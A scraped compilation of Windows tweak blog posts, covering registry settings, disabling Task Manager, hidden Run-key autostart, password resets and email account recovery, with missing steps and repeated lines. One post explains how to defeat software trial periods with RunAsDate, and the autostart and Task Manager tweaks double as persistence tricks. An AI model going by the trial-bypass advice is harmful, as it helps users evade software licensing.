0×01–Show Network Connections as link
0×02–Show Network Connections as menu
Start_AdminToolsTemp
0×00–Hide Administrative Tools
0×01–Show on All Programs menu
0×02–Show on All Programs menu and Start menu
Start_ShowHelp
0×00–Hide Help and Support
0×01–Show Help and Support
Start_ShowNetPlaces
0×00–Hide My Network Places
0×01–Show My Network Places
Start_ShowOEMLink
0×00–Hide Manufacturer Link
0×01–Show Manufacturer Link
Start_ShowPrinters
0×00–Hide Printers and Faxes
0×01–Show Printers and Faxes
Start_ShowRun
0×00–Hide Run command
0×01–Show Run command
Start_ShowSearch
0×00–Hide Search command
0×01–Show Search command
Start_ScrollPrograms
0×00–Don’t scroll Programs menu
0×01–Scroll Programs menu
At times it becomes necessary to disable the Windows Key on the keyboard. For example when playing games this nasty Windows Logo key keeps annoying, as we often accidently press it and this takes our game out to the desktop. So it becomes necessary to disable it when not needed an re-enable it when needed.
The following download consists of two registry scripts (.reg) one to disable windows key and the other to re-enable it. In this download there are two files
disable_winlogo_key.reg - Disable Windows Logo Ley
re-enable_winlogo_key.reg - Re-Enable Windows Logo Key
re-enable_winlogo_key.reg - Re-Enable Windows Logo Key
Here is the Download Link
The following registry hack enables us to disable the Task Manager. Here is a step by step procedure to disable Windows task manager.
Step1: Goto start>run and type “regedit” in the run.
Step2: In the registry navigate to
HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System
Step 3: Make the changes according to the following data
Value Name: DisableTaskMgr
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = default, 1 = disable Task Manager)
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = default, 1 = disable Task Manager)
Step 4: Then navigate to
HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Policies\System
Step 5: Make the changes according to the following data
Value Name: DisableTaskMgr
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = default, 1 = disable Task Manager)
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = default, 1 = disable Task Manager)
Step 6. In the Step 3 and 4, if the values are set to 1 then the Task Manager is disabled. Revert back to 0 in order to enable it back
WARNING: Please Backup your registry before attemting this hack. Changes to registry may lead to system failure.
This tweak allows a program to be launched when the user logs onto the computer. It can be set to run minimized and there is no trace of the executable in the Startup folder on the Start Menu nor in the Documents and Settings folder accessible via Windows Explorer.
HKEY_CURRENT_USER\Software\
Microsoft \Windows\CurrentVersion\Run
Microsoft \Windows\CurrentVersion\Run
Data Type: REG_SZ [String Value]
Value Name: [Enter the Name of Program Executable]
Value Data: [Enter the Path to the Program Executable]
Value Name: [Enter the Name of Program Executable]
Value Data: [Enter the Path to the Program Executable]
Can you create a folder named “con”, “prn”, “nul” “com1″ “com2″ “lpt1″ etc. in windows ?
The answer is NO and YES!
NO because when create a new folder and try to rename it to any one of the above specified names, you know what happens! In Windows XP the folder name automatically changes back to “New Folder” no matter you try any number of times. Where as in Windows Vista/7 when you try to rename the file you get an error message “The specified device name is invalid”.
What is the reason for this? Simple, these names represent the internal devices and hence we cannot create folders with the above names.
2. Type in prompt (FOR EG. TO CREATE CON FOLDER IN E: DRIVE)
C:\>md \\.\e:\con
NOTE: “con” can be replaced by any other names such as “prn”, “nul” “com1″ “com2″ “lpt1″ etc.
C:\>rd \\.\e:\con
NOTE: The folder can only be deleted from the command prompt.You cannot remove it by right-click delete.
Yes it is possible to change Adminstrator password both in Win XP and Vista without knowing it. If you somehow manage to login as an Administrator then you can change the password without knowing it.
Here’s the Step-By-Step instructions
1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu.
2. Select the option “Manage”.
3. On the left pane expand the “Computer Management (Local) tree (if it is not already expanded)
4. Double click “Local Users and Groups” option From “System Tools” tree.
5. Click the “Users” option.
6. Now you will see the list of users on the right side pane, such as Administrator, Guest etc.
7. Right click the “Administrator” and select the option “Set Password” option.
8. Now you will see a warning message, Click on proceed.
9. Now the system asks you for “New Password” and “Confirm Password” .
10. After entering the password click on “OK”. The password is changed. That’s It!
In this post I’ll show you how to hack a Software and run the trial program forever. Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?
Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.
When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.
So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.
RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista.
NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate.
3. After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.
For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate. I hope this helps! Please express your experience and opinions through comments.
Some times it becomes necessary to change the ICON of an executable (.exe) file so that the exe file get’s a new appearence. Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user. But in reality when the file is carried to a different computer, then it shows it’s original ICON itself. This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself. Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.
For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie: The tool changes the exe ICON permanantly.
I’ll give you a step-by-step instruction on how to use this tool to change the icon.
1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).
2. Right-click on the exe file whose ICON is to be changed.
3. Now you will see the option Change Icon. Click on that option.
4. Now the Icon Changer program will open up.
5. Icon changer will search for all the ICONS on your system so that you can select any one of those.
6. Now select the ICON of your choice and click on SET.
7. Now a popup window will appear and ask you to select from either of these two options.
- Change embeded icon.
- Adjust Windows to display custom icon.
Select the first option (Change embeded icon).
8. You are done. The ICON get’s changed.
If your PC has multiple users then you can now display legal notice to every user before they login to your PC. This legal notice will be displayed at every startup just before the Desktop is loaded. Using this you can tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do this pretty easily. For this there is one small registry hack. Here is the step-by-step instruction to do this.
2. Navigate to the following key in the registry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \policies\system
3. Next below this look for “legalnoticetext” and enter the desired Legal Notice Text. The legal notice text can be up to a page in it’s size so that it can include a set of do’s and dont’s for your computer.
4. After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer. This trick works on both XP and Vista. You can also try it on Windows 7 and should work with no problems.
Hope you like this post. Pass your comments.
Do you want to password protect your folder? Do you want to make it invisible so that it remains unnoticed by the normal users? Well here is a way to do that. In this post I will show you how to make a password protected folder in Windows without using any additional software. Here is is step by step procedure to create a password protected folder.
How to create a Password Protected Folder?
Step-2: Now in this folder place all the important files, documents or any folders that you want to password protect.
Step-3: Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.
Step-4: Now a new compressed zipped folder gets created next this folder (ABC) with the same name.
Step-5: Double-click on this compressed zipped folder and you should see your original folder (ABC) here.
Step-6: Now goto the File menu and select the option Add a password.
ie: File -> Add a password
Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.
How to make it Invisible?
Step-2: At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).
Step-3: In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options
- Do not show hidden files and folders
- Show hidden files and folders
Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.
I hope you like this post. Pass your comments!! CheersHere is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.
If you are running a Microsoft Windows operating system on your computer, then you are most likely aware of the fact that your PC will have a Product ID. This Product ID is a system specific alphanumeric code which is derived/calculated based on the Windows product key you use and the hardware configuration of your Computer. In simple words, Product ID is the alphanumeric code that you see when you Right-Click on the My Computer icon and select the Properties option.
Ever wondered how to alter the Windows Product ID?
It is possible to alter the Windows Product ID and change it to what ever you like. For example, you can change the Product ID and put your nickname in place of the formal Product ID displayed by the Operating System. This hack is too easy and can be done within minutes. The screenshot showing the altered Product ID is given below
Win 7 PC showing Original PID
Windows 7 PC showing Altered PID
As you can see from the above screenshot it is simple and easy to make your Windows display what ever you want in the place of the real Product ID. Here is a step-by-step procedure to alter your Windows Product ID.
1. Goto Start->Run and type the following in the Run dialog box
regedit
2. After you open the Registry Editor, navigate to the following key
HKey_Local_Machine\Software\Microsoft\Windows NT\Current Version
4. Double-Click on ProductID, a dialog box will pop-up showing your Windows PID. Now you can
delete the original PID and enter anything of your choice.
5. Once you are done, just click on OK and close the Registry Editor. Now you can see the altered Product ID in the Windows Properties window.
NOTE: This trick works on Win 7, Vista and Win XP
It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures to get back your hacked email account.
If you cannot find success from the Step-1 then proceed to Step-2.
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…
For Gmail:
It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.
Step -1: Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link
Step-2: Many times the hacker will change the secret question and secondary email address right after the account is compromised. This is the reason for the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like
1. Email addresses of up to five frequently emailed contacts2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…
You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out this form. This is your last chance! The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link
For Yahoo and Hotmail:
Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option.
To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.
I hope this post will help you recover the lost account. I highly recommend that you also read my post on How to protect your email account from being hacked and Tips to find unauthorized activity on your Gmail account so that you always stay protected
Do you suspect that your email account is under attack? Do you want to maintain total security of your email account and make it 100% hack proof? Well, Some times our email account might have got hacked and we may not be aware of that. We may believe that our email account is safe, but in reality our private and confidential information may be falling into the hands of a third person.
Please pass your comments and express your opinions.
Here are some signs of unauthorized activity on an email account.
1. Your new emails are marked as Read even if you’ve not read them.
2. Your emails are moved to Trash or even permanently deleted without your notice.
3. Your emails are being forwarded to a third party email address (check your settings-> forwarding).
4. Your secondary email address is changed.
If you come across any of the above activities on your email account, then it is a clear indication that your email account is hacked.
Additional Security Features in Gmail to ensure the Safety of your Account
Gmail provides an additional security feature to protect your email account through the means of IP address logging. That is, Gmail records your IP address every time you login to your Gmail account. So, if a third party gets access to your account then even his/her IP is also recorded. To see a list of recorded IP address, scroll down to the bottom of your Gmail account and you’ll see something like this.
You can see from the above figure that Gmail shows the IP address of last login (last account activity). You can click on Details to see the IP address of your last 5 activities. If you find that the IP listed in the logs doesn’t belong to you, then you can suspect unauthorized activity.
Steps to be carried out to stop unauthorized activity on your email account
If you feel/suspect that your account is hacked then you must immediately take the actions mentioned below
1. Change your Password
2. Change your security question.
2. Remove any third party email address (if any) to which your account is set to forward emails.
3. Make sure that you can access the email account of your secondary email address.
4. Also change you secondary email password and security question.
This ensures that your account is safe from future attacks. But I strongly recommend that you read the following post to protect your email account from being hacked.
How to Protect Your Email Account from being HackedPlease pass your comments and express your opinions.